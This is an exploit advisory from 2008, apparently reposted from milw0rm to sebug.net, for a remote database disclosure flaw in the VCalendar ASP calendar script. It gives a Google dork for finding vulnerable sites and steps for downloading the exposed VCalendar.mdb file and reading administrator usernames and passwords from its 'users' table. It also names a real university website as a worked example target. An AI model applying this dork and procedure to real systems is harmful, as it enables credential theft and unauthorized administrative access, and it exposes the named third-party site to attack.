VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability
Published:2008-11-20
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [+] Vcalendar_asp Mdb Vulnerability [+] [+] ---------------------------------------------------------- [+] Author : Swan [+] [+] Date : 20.11.2008 [+] [+] Contact : Swantska@Gmail.Com [+] [+] ----------------------------------------------------------- Script : Vcalendar_asp Download : http://www.aspindir.com/indir.asp?id=4048&sIslem=Indir Dork : "inurl:vcalendar_asp" Our mdb path : db/VCalendar.mdb Exploit : Step 1 - http://www.[target].com/[path]/vcalendar_asp/db/VCalendar.mdb Step 2 - Download that mdb file and read admin name & pass from "users" table. Step 3 - http://www.[target].com/[path]/vcalendar_asp/login.asp Example : http://www.soest.hawaii.edu/asp/vcalendar_asp/index.asp http://www.soest.hawaii.edu/asp/vcalendar_asp/db/VCalendar.mdb http://www.soest.hawaii.edu/asp/vcalendar_asp/login.asp [+] ---------------------------------------------------------------------- [+] Special Thanks : str0ke & Turkish Nation [+] [+] Zone-h.Org & Milw0rm.Com [+] [+] ---------------------------------------------------------------------- [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]
// Sebug.net [ 2008-11-21 ]